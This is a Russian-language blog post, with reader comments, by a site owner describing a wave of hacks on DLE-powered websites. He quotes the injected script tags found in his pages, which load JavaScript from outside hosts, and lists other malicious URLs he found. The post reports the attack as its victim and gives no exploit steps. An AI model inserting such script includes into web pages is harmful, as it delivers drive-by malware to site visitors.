Опубликованные статьи


Серия взломов сайтов на DLE

В последнюю декаду декабря и в праздничные дни, когда все нормальные люди отдыхали, Рунет потрясла серия взломов сайтов на популярной системе управления сайтов DLE, которая меня коснулась самым непосредственным образом. Я активно использую DLE на собственных сайтах, она мне нравится множеством хаков и модов, позволяющих расширить функционал этой замечательной смски.

Несмотря на популярность DLE остается одним из самых дырявых движков в Рунете, и разработчики периодически выпускают заплатки, позволяющие затыкать дыры. Делают это они умышленно, или просто так получается, мне неведомо и до сих пор остается загадкой. Но, вернемся к делу. В конце декабря я был неприятно удивлен, что открывая часть своих сайтов в браузере, дядя Касперский говорил свое ФИ, и блокировал подозрительные объекты с высокой опасностью. Когда я начал внимательно изучать что не понравилось Касперу на моих сайтах, я обнаружил, что в каждую полную и короткую новость встроены ифреймы, ведущие на under-click, какое-то УГ на народе, и самое ужасное на сайты на Юкозе! Все это выглядело примерно так:

1
2
3
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>
<script src="http://zheenix.msk.ru/f71879559bcfc86dd2ddeb0cf71e135c.js" type="text/javascript"></script>
<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

Причем на каждом пациенте коды были разные. Это мог быть http://under-click.ru/js/ , и http://diz777vik.narod2.ru/1/, и хрен пойми чего вида http://tlrpvc.info/counter/cskpflfwfwezg3.jar/bpac/

Ох, как я не люблю сайты на козе! Ифреймы ведущие на козу, привели меня в бешенство, и я начал искать способы решения проблемы. После недолгих поисков я обнаружил в паблике тему взлома сайтов на DLE версии ниже 9.0, и мне все сразу стало ясно.

Я воспользовался этой методикой на одном из своих сайтов, и для того, чтобы получить все данные, мне хватило 10 минут. Представив себе, как эта жалкая школота на своих юкозовских форумах стучит себя кулаком в грудь, и хвастается, что они якобы взломали мои сайты, я опять пришел в бешенство! Вот такая ночь бешенства выдалась мне вчера.

Есть ли способы лечения сайтов на DLE, пораженные скул хакерами? Есть, и в следующей публикации я расскажу вам, дорогие друзья, как послать на хуй охреневшую школоту, у которой мозга хватает лишь пользоваться палеными темами.

А с этого момента на моем блоге появляется рубрика DLE, где мы будем обсуждать все прелести и недостатки этой смски.



Поделись с друзьями!

    Получай обновления сайта прямо на e-mail!

    Введите Ваш email:

    Кроме того, интересно почитать:

Comments10 комментариев

 

  1. Замечательной смски?
    Да у нее что ни новость, то провал.

  2. Я не знаю конечно… у каждого свои вкусы. Ломают все движки, но мне лично DLE нравится, удобная, даже в чем-то функциональная, не нагружает сервера, проста в использовании (не нужно объяснять долго как и что добавлять), и не дорогая.

  3. Это не цмс, а сплошная дыра. Лучше юзать джумлу.

  4. wertock говорит, что:
    Лучше юзать джумлу.

    Джумлу не перевариваю из-за ее тормознутости, и замороченности. Джумла вообще я считаю сделана не для людей.

  5. Попробуйте NGCMS

  6. @ wertock:

    Зачем? =) Я уже консервативен :-D Использую смски, которые знаю и люблю. Это вордпресс, DLE и vBulletin =)

  7. 9SEO:

    webwm говорит, что:
    wertock говорит, что:
    Лучше юзать джумлу.
    Джумлу не перевариваю из-за ее тормознутости, и замороченности. Джумла вообще я считаю сделана не для людей.

    +1, полностью согласен.

    P.S: тоже сломали 6 сайтов на DLE таким же образом…
    Но версия дле была 9.0. *CRAZY*

  8. @ 9SEO:

    Вот я и говорю, что версия не имеет никакого значения… Как только палится дыра для школоты, так и начинаются взломы :(

  9. Всем привет,ппц меня тоже взломали, весь дизайн убили!!!!(((( Пришлось какойнибудь скачать и установить, кто знает что делать помогите!Версия dle 9.2(но я слышал что лучше версия 8.5,ее трудней сломать)сайт alfainfa.ru ,сайт делал 4месеца;(вот моя аська:617-905-406 ,зарание спасибо(

  10. Игорь говорит, что:
    кто знает что делать помогите!

    Почитайте статьи в этом разделе:
    http://webwm.net/category/dle/

    Этого достаточно для защиты от взлома. А эти способы должны работать и на 9-й версии.

Комментировать